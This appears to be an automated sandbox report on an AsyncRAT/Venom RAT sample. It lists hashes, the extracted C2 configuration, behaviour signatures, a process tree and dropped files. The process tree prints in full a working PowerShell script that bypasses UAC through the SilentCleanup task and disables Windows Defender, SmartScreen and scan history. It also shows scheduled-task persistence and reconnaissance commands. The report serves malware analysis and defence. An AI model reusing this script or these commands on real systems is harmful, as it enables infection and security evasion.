Analysis

  • max time kernel
    420s
  • max time network
    421s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-08-2024 07:58

General

  • Target

    Client.exe

  • Size

    63KB

  • MD5

    a8515eaaad39b50757b65dacd5c17042

  • SHA1

    98bf1b3765448f24447bdcd4117e972fae8fe09e

  • SHA256

    f22ec9c2df8efd42827f0c23c3a47c5cd776e2213cad5f1e067c4f2e4ac0cebe

  • SHA512

    d35bc0179ef0a94fbe579fc4c2991a5a8e720eea2fc70d50a731d37b3934bc90214239339840fcfd82553d08ba54d22dc56d182902cead6d8a2692065a3cd667

  • SSDEEP

    1536:QhW5hc1kw0kV7eeiIVrGbbXw5o6zUKGODpqKmY7:QhW5hc1kWVieXGbbX76w0gz

Malware Config

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

C2

software-julia.gl.at.ply.gg:17106

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes
  • delay

    1

  • install

    true

  • install_file

    Windows.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • UAC bypass 3 TTPs 3 IoCs
  • Async RAT payload 1 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Start PowerShell.

  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Delays execution with timeout.exe 2 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies data under HKEY_USERS 46 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1920
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows" /tr '"C:\Users\Admin\AppData\Roaming\Windows.exe"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2316
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "Windows" /tr '"C:\Users\Admin\AppData\Roaming\Windows.exe"'
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4192
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC43A.tmp.bat""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4024
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:2824
      • C:\Users\Admin\AppData\Roaming\Windows.exe
        "C:\Users\Admin\AppData\Roaming\Windows.exe"
        3⤵
        • UAC bypass
        • Checks computer location settings
        • Deletes itself
        • Executes dropped EXE
        • Checks whether UAC is enabled
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:3404
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ] 
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ ' 
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' } 
 
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   } 
 
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1 
 
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e ' 
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0 
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 } 
 
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' ) 
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n 
 
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 } 
 
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9 
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r ' 
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t 
 
 i f   ( $ u   - e q   0 )   { 
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k 
 } 
 i f   ( $ u   - e q   1 )   { 
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k } 
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' ) 
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 } 
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k 
 } 
 i f   ( $ u   - e q   2 )   { 
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ , 
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 ) 
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I ) 
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 ) 
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e 
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ; 
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z ) 
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } } 
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1 
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) ) 
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0 
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k 
 } 
 
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r ' 
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l } 
 
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0 
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0 
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0 
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0 
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0 
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0 
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0 
 n e t 1   s t o p   w i n d e f e n d 
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E 
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0 
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1 
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y 
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0 
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) 
 # - _ - # 
          4⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2120
          • C:\Windows\system32\sc.exe
            "C:\Windows\system32\sc.exe" qc windefend
            5⤵
            • Launches sc.exe
            PID:4596
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
            5⤵
              PID:2296
            • C:\Windows\system32\whoami.exe
              "C:\Windows\system32\whoami.exe" /groups
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:5068
            • C:\Windows\system32\net1.exe
              "C:\Windows\system32\net1.exe" start TrustedInstaller
              5⤵
                PID:4608
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\Client.exe"' & exit
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3248
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\Client.exe"'
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2528
                • C:\Users\Admin\AppData\Local\Temp\Client.exe
                  "C:\Users\Admin\AppData\Local\Temp\Client.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3256
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4020
              • C:\Windows\system32\systeminfo.exe
                systeminfo
                5⤵
                • Gathers system information
                PID:3220
              • C:\Windows\system32\HOSTNAME.EXE
                hostname
                5⤵
                  PID:2544
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic logicaldisk get caption,description,providername
                  5⤵
                  • Collects information from the system
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1972
                • C:\Windows\system32\net.exe
                  net user
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3800
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 user
                    6⤵
                      PID:4996
                  • C:\Windows\system32\query.exe
                    query user
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2812
                    • C:\Windows\system32\quser.exe
                      "C:\Windows\system32\quser.exe"
                      6⤵
                        PID:516
                    • C:\Windows\system32\net.exe
                      net localgroup
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:5080
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 localgroup
                        6⤵
                          PID:804
                      • C:\Windows\system32\net.exe
                        net localgroup administrators
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:900
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 localgroup administrators
                          6⤵
                            PID:1444
                        • C:\Windows\system32\net.exe
                          net user guest
                          5⤵
                            PID:4480
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 user guest
                              6⤵
                                PID:4912
                            • C:\Windows\system32\net.exe
                              net user administrator
                              5⤵
                                PID:2388
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user administrator
                                  6⤵
                                    PID:1412
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  wmic startup get caption,command
                                  5⤵
                                    PID:2108
                                  • C:\Windows\system32\tasklist.exe
                                    tasklist /svc
                                    5⤵
                                    • Enumerates processes with tasklist
                                    PID:3556
                                  • C:\Windows\system32\ipconfig.exe
                                    ipconfig /all
                                    5⤵
                                    • Gathers network information
                                    PID:5064
                                  • C:\Windows\system32\ROUTE.EXE
                                    route print
                                    5⤵
                                      PID:4600
                                    • C:\Windows\system32\ARP.EXE
                                      arp -a
                                      5⤵
                                      • Network Service Discovery
                                      PID:1016
                                    • C:\Windows\system32\NETSTAT.EXE
                                      netstat -ano
                                      5⤵
                                      • System Network Connections Discovery
                                      • Gathers network information
                                      PID:3296
                                    • C:\Windows\system32\sc.exe
                                      sc query type= service state= all
                                      5⤵
                                      • Launches sc.exe
                                      PID:668
                                    • C:\Windows\system32\netsh.exe
                                      netsh firewall show state
                                      5⤵
                                      • Modifies Windows Firewall
                                      • Event Triggered Execution: Netsh Helper DLL
                                      PID:2872
                                    • C:\Windows\system32\netsh.exe
                                      netsh firewall show config
                                      5⤵
                                      • Modifies Windows Firewall
                                      • Event Triggered Execution: Netsh Helper DLL
                                      PID:5032
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows"
                                    4⤵
                                      PID:4936
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks /delete /f /tn "Windows"
                                        5⤵
                                          PID:1220
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp40B5.tmp.bat""
                                        4⤵
                                          PID:4276
                                          • C:\Windows\system32\timeout.exe
                                            timeout 3
                                            5⤵
                                            • Delays execution with timeout.exe
                                            PID:4632
                                  • C:\Windows\servicing\TrustedInstaller.exe
                                    C:\Windows\servicing\TrustedInstaller.exe
                                    1⤵
                                      PID:1356
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
                                        2⤵
                                        • Modifies Windows Defender Real-time Protection settings
                                        • Command and Scripting Interpreter: PowerShell
                                        • Modifies data under HKEY_USERS
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of WriteProcessMemory
                                        PID:2240
                                        • C:\Windows\system32\sc.exe
                                          "C:\Windows\system32\sc.exe" qc windefend
                                          3⤵
                                          • Launches sc.exe
                                          PID:2672
                                        • C:\Windows\system32\cmd.exe
                                          "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                          3⤵
                                            PID:4604
                                          • C:\Windows\system32\whoami.exe
                                            "C:\Windows\system32\whoami.exe" /groups
                                            3⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3264
                                          • C:\Windows\system32\net1.exe
                                            "C:\Windows\system32\net1.exe" stop windefend
                                            3⤵
                                              PID:4376
                                            • C:\Windows\system32\sc.exe
                                              "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                                              3⤵
                                              • Launches sc.exe
                                              PID:1232

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log

                                          Filesize

                                          425B

                                          MD5

                                          fff5cbccb6b31b40f834b8f4778a779a

                                          SHA1

                                          899ed0377e89f1ed434cfeecc5bc0163ebdf0454

                                          SHA256

                                          b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76

                                          SHA512

                                          1a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9

                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                          Filesize

                                          3KB

                                          MD5

                                          556084f2c6d459c116a69d6fedcc4105

                                          SHA1

                                          633e89b9a1e77942d822d14de6708430a3944dbc

                                          SHA256

                                          88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

                                          SHA512

                                          0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                          MD5

                                          331841fe482ffe8b1cc1509733d8ca67

                                          SHA1

                                          1e3257cca1b2c7c3aaf4cf1f138c9e9e665e8cb8

                                          SHA256

                                          14112a43248df71bdf7668c923f541190c6417ef37796605cf8114f565648d0f

                                          SHA512

                                          039e5991132912f94b3fbe23146ee61bb822aada6a3f2b37bca226c76c162e04a106f3626587ff079411a03e6e9a4813ad04813ada4694f9b78f49e1925389d9

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                          MD5

                                          bed47e331c1f64eac1cf3026d169091c

                                          SHA1

                                          46ee9011b9a9a623110544108991a9b34207234a

                                          SHA256

                                          f756a6cdc8937d1dc9fc83a5c6ea84b28c0fbcc3322577acf70770e7877716c3

                                          SHA512

                                          3a7c52953e7c7c1cd58895a49aea8855331e8a4ce1af82e8f11fa483c31627c3eb9be1da5f529c2d2a69296b90c738566d1d1bfed43882ddf8985ff8eea7f77b

                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jfee2p2v.w23.ps1

                                          Filesize

                                          60B

                                          MD5

                                          d17fe0a3f47be24a6453e9ef58c94641

                                          SHA1

                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                          SHA256

                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                          SHA512

                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                        • C:\Users\Admin\AppData\Local\Temp\tmp40B5.tmp.bat

                                          Filesize

                                          156B

                                          MD5

                                          45fb8c482bfdd1f5479b7d64e1654fd6

                                          SHA1

                                          63fe861ab0ca7121e146f8e25b74b86da4f43ecc

                                          SHA256

                                          d2841d2d2febbd1416ff57260c6206a14bd0041b7e82cd031577f459f339a51e

                                          SHA512

                                          ca907d39021727efaa64840532451ec53e91ecee77b159592c87bf90958bf40c112ecf718beb6dddb7cd678aee1777f74b8087bb4c0ae0903017c8fd47ea148c

                                        • C:\Users\Admin\AppData\Local\Temp\tmpC43A.tmp.bat

                                          Filesize

                                          151B

                                          MD5

                                          1be5ab019590290dfc28b13aa36b3ea9

                                          SHA1

                                          1fe5b07116c1fe90de18bbee57675919b5903f21

                                          SHA256

                                          af1ef5df048dc2bdbbf6cb2aada119ba522348f505825e91ecda84d3cbb4ad77

                                          SHA512

                                          f3b1087791f346fc80e86b2be0d36509f695b7f5135b73615132aa3a7d7ce016fab60b407af001e6c8a06e2ef45a8eb27909dfdd940a7c3a942ba4e48daffbda

                                        • C:\Users\Admin\AppData\Roaming\Windows.exe

                                          Filesize

                                          63KB

                                          MD5

                                          a8515eaaad39b50757b65dacd5c17042

                                          SHA1

                                          98bf1b3765448f24447bdcd4117e972fae8fe09e

                                          SHA256

                                          f22ec9c2df8efd42827f0c23c3a47c5cd776e2213cad5f1e067c4f2e4ac0cebe

                                          SHA512

                                          d35bc0179ef0a94fbe579fc4c2991a5a8e720eea2fc70d50a731d37b3934bc90214239339840fcfd82553d08ba54d22dc56d182902cead6d8a2692065a3cd667

                                        • memory/1920-26-0x00007FFD48EB0000-0x00007FFD49971000-memory.dmp

                                          Filesize

                                          10.8MB

                                        • memory/1920-0-0x00007FFD48EB3000-0x00007FFD48EB5000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/1920-1-0x0000000000010000-0x0000000000026000-memory.dmp

                                          Filesize

                                          88KB

                                        • memory/1920-2-0x00007FFD48EB0000-0x00007FFD49971000-memory.dmp

                                          Filesize

                                          10.8MB

                                        • memory/2120-21-0x00000184E5890000-0x00000184E58B2000-memory.dmp

                                          Filesize

                                          136KB

                                        • memory/3404-57-0x000000001C020000-0x000000001C16A000-memory.dmp

                                          Filesize

                                          1.3MB

                                        • memory/3404-13-0x000000001CF20000-0x000000001CF96000-memory.dmp

                                          Filesize

                                          472KB

                                        • memory/3404-14-0x0000000002D80000-0x0000000002D8E000-memory.dmp

                                          Filesize

                                          56KB

                                        • memory/3404-58-0x000000001C1C0000-0x000000001C210000-memory.dmp

                                          Filesize

                                          320KB

                                        • memory/3404-64-0x000000001C180000-0x000000001C190000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/3404-65-0x000000001C170000-0x000000001C17E000-memory.dmp

                                          Filesize

                                          56KB

